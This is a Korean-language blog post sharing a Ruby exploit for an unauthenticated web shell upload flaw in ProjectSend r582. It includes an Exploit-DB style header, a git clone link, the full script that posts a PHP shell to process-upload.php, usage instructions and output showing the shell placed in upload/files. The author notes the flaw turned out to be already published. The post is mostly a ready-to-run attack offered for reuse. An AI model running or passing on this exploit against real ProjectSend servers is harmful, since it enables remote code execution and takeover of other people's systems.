Back

[WEB HACKING] ProjectSend R582 WebShell 취약점(Exploit) [ZERODAY?]

최근 ProjectSend 라는 프레임워크에 대해 분석하던 중 Webshell 업로드가 가능한 취약점을 찾아 Exploit-db에 업로드하였으나.. 알고보니 기존에 올라왔던 취약점이였습니다 =_= .. 그저 기쁜마음에 스크립트부터 작성하여 넘겼지만 찾아볼 생각을 하지 않았었네요..

그래도 간단하게 ruby 언어로 짜서 사용가능하기에 블로그 통해 공유드릴까합니다.

현재 최신버전인 r582에서도 동작하는 제로데이네요.

GIT Repo

https://github.com/hahwul/ProjectSend_r582_webshell.git

git clone https://github.com/hahwul/ProjectSend_r582_webshell.git

Source Code

ProjectSend_r582_webshell.rb

——————————————————————–

Exploit Title: ProjectSend-r582 WebShell Upload(non-auth)

Date: 2015-07-01

Exploit Author: hahwul

Blog: http://www.codeblack.net

Vendor Homepage: http://www.projectsend.org

Software Link: http://www.projectsend.org/download/108/

Version: ProjectSend-r582

Tested on: debian [wheezy]

CVE : none

——————————————————————–

require “net/http” require “uri” require “net/http/post/multipart”

if ARGV.length != 2

puts “ProjectSend r582ver Webshell Upload” puts “Usage: ruby ProjectSend_r582_webshell.rb [targetURL] [ShellFile]” puts " targetURL(ex): http://127.0.0.1/vul_test/ps" puts " ShellFile(ex): MyShell.php" puts " Example : ~~.rb http://127.0.0.1/vul_test/ps MyShell.php" puts " Include Gem : gem install multipart-post" puts " exploit & code by hahwul[www.codeblack.net]"

else

target_url = ARGV[0] # http://127.0.0.1/ps/ shell_name = ARGV[1] # myshell.php exp_url = target_url + “/process-upload.php”

uri = URI.parse(exp_url) http = Net::HTTP.new(uri.host, uri.port)

multipartParams = {“file” => UploadIO.new(File.new(shell_name), “application/octet-stream”, “shell.php”)} multipartParams = multipartParams.merge({“name”=>“shell.php”}) request = Net::HTTP::Post::Multipart.new(uri.request_uri, multipartParams) request[“Accept”] = “text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8” request[“Cache-Control”] = “no-cache” request[“User-Agent”] = “Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.7.0” request[“Connection”] = “keep-alive” request[“Accept-Language”] = “ko-kr,ko;q=0.8,en-us;q=0.5,en;q=0.3” request[“Accept-Encoding”] = “gzip, deflate” request[“Pragma”] = “no-cache” response = http.request(request)

puts “Target: “+uri.host+uri.path puts “Exploit…” puts “Status code: “+response.code puts “Open WebShell Page :: “+target_url+"/upload/files/"+shell_name

end

Execute & Result

ruby ProjectSend_r582_webshell.rb http://127.0.0.1/vul_test/ps shell.php

Target: 127.0.0.1/vul_test/ps/process-upload.php Exploit… Status code: 302 Open WebShell Page :: http://127.0.0.1/vul_test/ps/upload/files/shell.php

Open Upload URL : http://127.0.0.1/vul_test/ProjectSend/upload/files/shell.php WEBSHELL UPLOAD total 12 drwxrwxrwx 2 hahwul hahwul 4096 Jul 1 01:21 . drwxrwxrwx 4 hahwul hahwul 4096 Jul 1 01:11 .. -rw-r–r– 1 www-data www-data 66 Jul 1 01:21 shell.php -rw-r–r– 1 www-data www-data 66 Jul 1 01:21 shell.php

Licensed under CC BY-NC-SA 4.0
Last updated on Jul 10, 2021 01:05 +0900